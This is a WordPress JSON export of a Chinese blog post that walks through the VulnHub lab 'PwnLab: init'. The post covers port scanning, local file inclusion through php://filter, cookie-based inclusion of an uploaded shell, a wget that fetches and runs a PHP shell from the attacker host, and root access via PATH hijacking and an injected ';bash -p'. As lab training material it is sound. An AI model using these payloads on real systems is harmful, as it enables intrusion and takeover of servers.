{"id":170,"date":"2024-04-18T23:29:52","date_gmt":"2024-04-18T15:29:52","guid":{"rendered":"http:\/\/xiyu12.top\/?p=170"},"modified":"2024-04-18T23:29:52","modified_gmt":"2024-04-18T15:29:52","slug":"pwnlab","status":"publish","type":"post","link":"http:\/\/www.xiyu12.top\/?p=170","title":{"rendered":"pwnlab"},"content":{"rendered":"\n<ul class=\"wp-block-list\">\n<li><strong>Name<\/strong>: PwnLab: init<\/li>\n\n\n\n<li><strong>Date release<\/strong>: 1 Aug 2016<\/li>\n\n\n\n<li><strong>Author<\/strong>:&nbsp;<a href=\"https:\/\/www.vulnhub.com\/author\/claor,331\/\">Claor<\/a><\/li>\n\n\n\n<li><strong>Series<\/strong>:&nbsp;<a href=\"https:\/\/www.vulnhub.com\/series\/pwnlab,92\/\">PwnLab<\/a><\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/www.vulnhub.com\/entry\/pwnlab-init,158\/\">PwnLab: init ~ VulnHub<\/a><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u4e00\u3001\u4fe1\u606f\u6536\u96c6<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">sudo nmap -sn 192.168.1.0\/24   \u83b7\u5f97\u76ee\u6807  192.168.1.131<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">sudo nmap -sT  &#8211;min-rate 10000 192.168.1.131  <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-04-18 13:41 CST\nNmap scan report for 192.168.1.131\nHost is up (0.0026s latency).\nNot shown: 65531 closed tcp ports (conn-refused)\nPORT      STATE SERVICE\n80\/tcp    open  http\n111\/tcp   open  rpcbind\n3306\/tcp  open  mysql\n37489\/tcp open  unknown\nMAC Address: 00:0C:29:8F:0E:10 (VMware)<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">sudo nmap -sV -sC -O -p 37489,80,3306,111 192.168.1.131<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>PORT      STATE SERVICE VERSION\n80\/tcp    open  http    Apache httpd 2.4.10 ((Debian))\n|_http-title: PwnLab Intranet Image Hosting\n|_http-server-header: Apache\/2.4.10 (Debian)\n111\/tcp   open  rpcbind 2-4 (RPC #100000)\n| rpcinfo: \n|   program version    port\/proto  service\n|   100000  2,3,4        111\/tcp   rpcbind\n|   100000  2,3,4        111\/udp   rpcbind\n|   100000  3,4          111\/tcp6  rpcbind\n|   100000  3,4          111\/udp6  rpcbind\n|   100024  1          34419\/udp6  status\n|   100024  1          37093\/udp   status\n|   100024  1          37489\/tcp   status\n|_  100024  1          39570\/tcp6  status\n3306\/tcp  open  mysql   MySQL 5.5.47-0+deb8u1\n| mysql-info: \n|   Protocol: 10\n|   Version: 5.5.47-0+deb8u1\n|   Thread ID: 41\n|   Capabilities flags: 63487\n|   Some Capabilities: FoundRows, SupportsLoadDataLocal, SupportsCompression, Speaks41ProtocolNew, LongPassword, ConnectWithDatabase, IgnoreSigpipes, Support41Auth, DontAllowDatabaseTableColumn, InteractiveClient, LongColumnFlag, Speaks41ProtocolOld, ODBCClient, IgnoreSpaceBeforeParenthesis, SupportsTransactions, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults\n|   Status: Autocommit\n|   Salt: kIle4pZSoU&lt;k)&amp;%$'5um\n|_  Auth Plugin Name: mysql_native_password\n37489\/tcp open  status  1 (RPC #100024)\nMAC Address: 00:0C:29:8F:0E:10 (VMware)\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nDevice type: general purpose\nRunning: Linux 3.X|4.X\nOS CPE: cpe:\/o:linux:linux_kernel:3 cpe:\/o:linux:linux_kernel:4\nOS details: Linux 3.2 - 4.9\nNetwork Distance: 1 hop\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 13.50 seconds<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u5df2\u77e5\u6709mysql \u670d\u52a1 WEB\u670d\u52a1  111 \u7aef\u53e3\u53ef\u80fd\u6709 nsf \u6587\u4ef6\u6302\u8f7d<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">showmount 192.168.1.131<br>clnt_create: RPC: Program not registered<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6ca1\u6709  nsf<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">web \u76ee\u5f55\u626b\u63cf<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>gobuster dir -u http:\/\/192.168.1.131 --wordlist=\/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt   -x  .txt,.zip,.html,.php     \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n&#91;+] Url:                     http:\/\/192.168.1.131\n&#91;+] Method:                  GET\n&#91;+] Threads:                 10\n&#91;+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n&#91;+] Negative Status codes:   404\n&#91;+] User Agent:              gobuster\/3.6\n&#91;+] Extensions:              html,php,txt,zip\n&#91;+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/images               (Status: 301) &#91;Size: 315] &#91;--&gt; http:\/\/192.168.1.131\/images\/]                                                                \n\/login.php            (Status: 200) &#91;Size: 250]\n\/.php                 (Status: 403) &#91;Size: 292]\n\/.html                (Status: 403) &#91;Size: 293]\n\/index.php            (Status: 200) &#91;Size: 332]\n\/upload.php           (Status: 200) &#91;Size: 19]\n\/upload               (Status: 301) &#91;Size: 315] &#91;--&gt; http:\/\/192.168.1.131\/upload\/]                                                                \n\/config.php           (Status: 200) &#91;Size: 0]\n\/.html                (Status: 403) &#91;Size: 293]\n\/.php                 (Status: 403) &#91;Size: 292]\n\/server-status        (Status: 403) &#91;Size: 301]\nProgress: 1102800 \/ 1102805 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u4e8c\u3001\u83b7\u5f97\u7acb\u8db3\u70b9<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u8bbf\u95eehttp:\/\/192.168.1.131<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/image-12-1024x191.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"191\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/image-12-1024x191.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-171\" style=\"width:840px;height:auto\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/image-13-1024x220.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"220\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/image-13-1024x220.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-172\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e24\u4e2a\u65b9\u5411    \u767b\u9646\u6846   \u548c  \u53c2\u6570page<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u767b\u9646\u6846  \u6d4b\u8bd5 SQL\u6ce8\u5165   &#8216; &#8221;  and 1=1  and 1=2  \u6ca1\u6709\u53cd\u5e94<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u53c2\u6570page      <\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u76ee\u5f55\u7a7f\u8d8a   \u6587\u4ef6\u5305\u542b  ..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd  \u6ca1\u6709\u53cd\u5e94<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd%00 \u6ca1\u6709\u53cd\u5e94<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f7f\u7528  php:\/\/  \u4f2a\u534f\u8bae   php:\/\/filter\/read=convert.base64-encode\/resource=<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>http:&#47;&#47;192.168.1.131\/?page=php:\/\/filter\/read=convert.base64-encode\/resource=login<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-18-233830-1024x219.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-18-233830-1024x219.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-176\"\/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e4b\u524d\u626b\u63cf\u5230\u4e00\u4e2aconfig.php    \u5305\u542b\u4e00\u4e0b<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-18-234137-1024x506.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-18-234137-1024x506.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-177\"\/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u83b7\u5f97mysl \u914d\u7f6e\u6587\u4ef6    \u767b\u9646mysql   \u83b7\u5f97\u8d26\u53f7   base64 -d \u89e3\u7801<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">mysql -h 192.168.1.131 -u root -p<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-18-234403.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-18-234403.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-178\" style=\"width:664px;height:auto\"\/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u767b\u9646web\u4e4b\u540e\u53ef\u4ee5  \u53ef\u4ee5\u8bbf\u95ee upload   \u4e0a\u4f20\u6587\u4ef6 <\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5229\u7528 \u6587\u4ef6\u5305\u542b\u6f0f\u6d1e \u67e5\u770bupload.php  \u7684\u4ee3\u7801<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php \nif(isset($_POST&#91;'submit'])) {\n\tif ($_FILES&#91;'file']&#91;'error'] &lt;= 0) {\n\t\t$filename  = $_FILES&#91;'file']&#91;'name'];\n\t\t$filetype  = $_FILES&#91;'file']&#91;'type'];\n\t\t$uploaddir = 'upload\/';\n\t\t$file_ext  = strrchr($filename, '.');\n\t\t$imageinfo = getimagesize($_FILES&#91;'file']&#91;'tmp_name']);\n\t\t$whitelist = array(\".jpg\",\".jpeg\",\".gif\",\".png\"); \n\t\tif (!(in_array($file_ext, $whitelist))) {\n\t\t\tdie('Not allowed extension, please upload images only.');\n\t\t}\n\t\tif(strpos($filetype,'image') === false) {\n\t\t\tdie('Error 001');\n\t\t}\n\t\tif($imageinfo&#91;'mime'] != 'image\/gif' &amp;&amp; $imageinfo&#91;'mime'] != 'image\/jpeg' &amp;&amp; $imageinfo&#91;'mime'] != 'image\/jpg'&amp;&amp; $imageinfo&#91;'mime'] != 'image\/png') {\n\t\t\tdie('Error 002');\n\t\t}\n\t\tif(substr_count($filetype, '\/')>1){\n\t\t\tdie('Error 003');\n\t\t}\n\t\t$uploadfile = $uploaddir . md5(basename($_FILES&#91;'file']&#91;'name'])).$file_ext;\n\n\t\tif (move_uploaded_file($_FILES&#91;'file']&#91;'tmp_name'], $uploadfile)) {\n\t\t\techo \"&lt;img src=\\\"\".$uploadfile.\"\\\">&lt;br \/>\";\n\t\t} else {\n\t\t\tdie('Error 4');}}}?><\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u53ef\u4ee5\u770b\u5230\u4e0a\u4f20\u7684\u8fc7\u6ee4\u6709\u51e0\u4e2a\u65b9\u9762\uff1a1. \u540e\u7f00  2.mime\u7c7b\u578b<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e24\u79cd\u65b9\u6cd5\u83b7\u5f97shell <\/p>\n\n\n\n<p class=\"wp-block-paragraph\">1.\u5bfb\u627e\u6587\u4ef6\u5305\u542b\u548c\u6587\u4ef6\u4e0a\u4f20  \u7684\u7ed3\u5408\u5229\u7528\u7684\u65b9\u6cd5<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php\n\/\/Multilingual. Not implemented yet.\n\/\/setcookie(\"lang\",\"en.lang.php\");\nif (isset($_COOKIE&#91;'lang']))\n{\n\tinclude(\"lang\/\".$_COOKIE&#91;'lang']);\n}\n\/\/ Not implemented yet.\n?>\n&lt;img src=\"images\/pwnlab.png\">&lt;br \/>\n&#91; &lt;a href=\"\/\">Home&lt;\/a> ] &#91; &lt;a href=\"?page=login\">Login&lt;\/a> ] &#91; &lt;a href=\"?page=upload\">Upload&lt;\/a> ]\n&lt;hr\/>&lt;br\/>\n&lt;?php\n\tif (isset($_GET&#91;'page']))\n\t{\n\t\tinclude($_GET&#91;'page'].\".php\");\n\t}\n\telse\n\t{echo \"Use this server to upload and share image files inside the intranet\";}>\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u53ef\u4ee5\u770b\u5230\u6587\u4ef6\u5305\u542b\u5728\u4e8eif (isset($_COOKIE[&#8216;lang&#8217;])){include(&#8220;lang\/&#8221;.$_COOKIE[&#8216;lang&#8217;]);}<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">curl http:\/\/192.168.1.131\/index.php -H&#8221;COOKIE:lang=..\/upload\/135c0e6e32394050f70dc6bdb4e18ab0.gif&#8221;<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-19-161918-1024x373.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-19-161918-1024x373.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-183\"\/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u62ff\u5230shell<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">2.\u4f7f\u7528 php_filter_chain_generator-main\u5de5\u5177  \u5728\u6587\u4ef6\u5305\u542b\u4e2drce<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-19-162333-1024x778.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-19-162333-1024x778.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-184\"\/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-19-162512.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/04\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-04-19-162512.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-185\"\/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>\u7136\u540e\u4f7f\u7528 wget  \u83b7\u5f97shell\npython3 -m http.server 8000\nwget http:\/\/192.168.1.130:8000\/htb-php -O \/tmp\/1.php\nphp 1.php<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u83b7\u5f97shell<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u4e09\u3001\u63d0\u6743<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e24\u4e2a\u63d0\u6743\u7684\u70b9<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">1.msgmike \u6587\u4ef6\u6709 S  \u6743\u9650   \u5e76\u4e14 \u6709cat  \u547d\u4ee4\u5728\u6587\u4ef6\u4e2d\u88ab\u6267\u884c      \u4f7f\u7528 \u73af\u5883\u52ab\u6301\u7684\u65b9\u5f0f\u63d0\u6743<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>cd \/tmp\ntouch cat\n\u7f16\u8f91 cat \u6587\u4ef6\u5185\u5bb9\n\/bin\/bash -p\nexport PATH=\/tmp:$PATH\n.\/msgmike\n\u63d0\u6743<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">2.msg2root  \u6587\u4ef6 \u6709S\u6743\u9650  \u5e76\u4e14\u6709  system()\u51fd\u6570    \u7ed5\u8fc7asprintf(&amp;command, &#8220;\/bin\/echo %s >> \/root\/messages.txt&#8221;, input); \u4e2d\u7684\u9650\u5236<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>.\/msg2root \n\u8f93\u5165 \uff1a 12;bash -p \n\u63d0\u6743<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n","protected":false},"excerpt":{"rendered":"<p>PwnLab: init ~ VulnHub \u4e00\u3001\u4fe1\u606f\u6536\u96c6 sudo nmap -sn 192.168.1.0 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":63,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[20,61,106,108],"class_list":["post-170","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-target-aircraft","tag-asprintf","tag-php-","tag-106","tag-108"],"_links":{"self":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/170","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=170"}],"version-history":[{"count":0,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/170\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/media\/63"}],"wp:attachment":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=170"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=170"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=170"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}